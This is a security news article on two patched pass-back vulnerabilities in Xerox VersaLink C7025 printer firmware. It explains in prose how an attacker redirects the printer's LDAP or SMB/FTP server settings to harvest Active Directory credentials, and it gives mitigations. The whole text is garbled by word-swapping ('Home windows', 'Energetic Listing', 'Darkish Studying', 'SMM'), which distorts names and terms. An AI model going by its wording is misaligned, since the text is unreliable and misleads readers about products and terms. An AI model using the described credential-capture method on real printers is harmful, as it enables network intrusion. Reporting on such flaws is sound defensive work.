A preferred small to midrange Xerox enterprise printer incorporates two now-patched vulnerabilities in its firmware that enable attackers a chance to achieve full entry to a corporation’s Home windows setting.
The vulnerabilities have an effect on firmware model 57.69.91 and earlier in Xerox VersaLink C7025 multifunction printers (MFPs). Each flaws allow what are generally known as pass-back assaults, a category of assaults that basically enable a nasty actor to seize consumer credentials by manipulating the MFPs’ configuration.
Full Entry to Home windows Environments
In sure conditions, a malicious actor who efficiently exploits the Xerox printer vulnerabilities would be capable to seize credentials for Home windows Energetic Listing, in response to researchers at Rapid7 who found the issues. “This implies they may then transfer laterally inside a corporation’s setting and compromise different crucial Home windows servers and file techniques,” Deral Heiland, principal safety researcher, IoT, for Rapid7 wrote in a latest weblog put up.
Xerox describes VersaLink C7025 as a multifunction printer that includes ConnectKey, a Xerox know-how that permits clients to work together with the printers over the cloud and through cellular gadgets. Amongst different issues, the know-how consists of security measures that, in response to Xerox, assist stop assaults, detect doubtlessly malicious adjustments to the printer, and defend towards unauthorized transmission of crucial knowledge. Xerox has positioned its VersaLink household of printers as perfect for small and medium-sized workgroups that print round 7,000 pages per 30 days.
The 2 vulnerabilities that Rapid7 found within the printer, and which Xerox has since fastened, are CVE-2024-12510 (CVSS rating: 6.7), an LDAP pass-back vulnerability; and CVE-2024-12511 (CVSS rating: 7.6) an SMB/FTP pass-back vulnerability.
The vulnerabilities, in response to Rapid7, enable an attacker to alter the MFP’s configuration in order to trigger the printer to ship a consumer’s authentication credentials to an attacker-controlled system. The assault would work if a weak Xerox VersaLink C7025 printer is configured for LDAP and/or SMB providers.
In such a state of affairs, CVE-2024-12510 would enable an attacker to entry the MFP’s LDAP configuration web page and alter the LDAP server IP deal with within the printer’s settings to level to their very own malicious LDAP server. When the printer subsequent tries to authenticate customers by checking the LDAP Consumer Mappings web page, it connects to the attacker’s pretend LDAP server as a substitute of the official company LDAP server. This paves the best way for the attacker to seize clear textual content LDAP service credentials, Heiland wrote.
CVE-2024-12511 permits related credential seize when the SMB or FTP scan operate is enabled on a weak Xerox VersaLink C7025 printer. An attacker with admin-level entry can modify the SMB or FTP server’s IP deal with to their very own malicious IP and seize SMM or FTP authentication credentials.
All it takes for an attacker to find a weak printer is to connect with an affected Xerox MFP machine via a Net browser, validate that the default password continues to be enabled, and be sure that the machine is configured for LDAP and/or SMB providers, Heiland tells Darkish Studying. “Additionally, it’s usually potential to question an MFP through SNMP and determine if LDAP providers are enabled and configured.”
The danger for organizations is that if a malicious actor had been to achieve any stage of entry to a enterprise community, they may use the pass-back assault to simply harvest Energetic Listing credentials with out being detected, he says. That will then enable them to pivot to extra crucial Home windows techniques inside a compromised setting. “Sadly,” he provides, “it is also not unusual to seek out LDAP settings on MFP gadgets that include Area Admin credentials,” which doubtlessly might give a nasty actor full management of a corporation’s Home windows setting.
“Since LDAP and SMB settings on MFP gadgets sometimes include Home windows Energetic Listing credentials, a profitable assault would give a malicious actor entry to Home windows file providers, area data, e-mail accounts, and database techniques,” Heiland says. “If a Area Admin account or account with elevated privileges was used for LDAP or SMB, then an attacker would have unfettered entry to doubtlessly the whole lot throughout the group’s Home windows setting.”
An Perfect State of affairs for Menace Actors
Jim Routh, chief belief officer at Saviynt, says an attacker would wish comparatively refined technical expertise to use these sorts of vulnerabilities. However for many who can, the LDAP vulnerability allows entry to Home windows Energetic Listing the place all administrator profiles and credentials reside. “It is the perfect state of affairs for the risk actor,” he notes. Each machine related to the Web has configuration choices that provide … an assault floor for the cybercriminal.”
Xerox has launched a patched model of the affected Xerox VersaLink MFP firmware, permitting buyer organizations to replace and repair the problems. Organizations that can’t instantly patch ought to set a “advanced password for the admin account and in addition keep away from utilizing Home windows authentication accounts which have elevated privileges, corresponding to a Area Admin account for LDAP or scan-to-file SMB providers,” in response to the Rapid7 weblog put up. “Additionally, organizations ought to keep away from enabling the remote-control console for unauthenticated customers.”
Printer vulnerabilities are a rising drawback for a lot of organizations due to the rise in distant and hybrid work fashions. A 2024 research by Quocirca discovered 67% of organizations had skilled a safety incident tied to a printer vulnerability, up from 61% the prior yr. Regardless of the development, many organizations proceed to underestimate printer-related threats, making it a mushy spot for attackers to focus on.
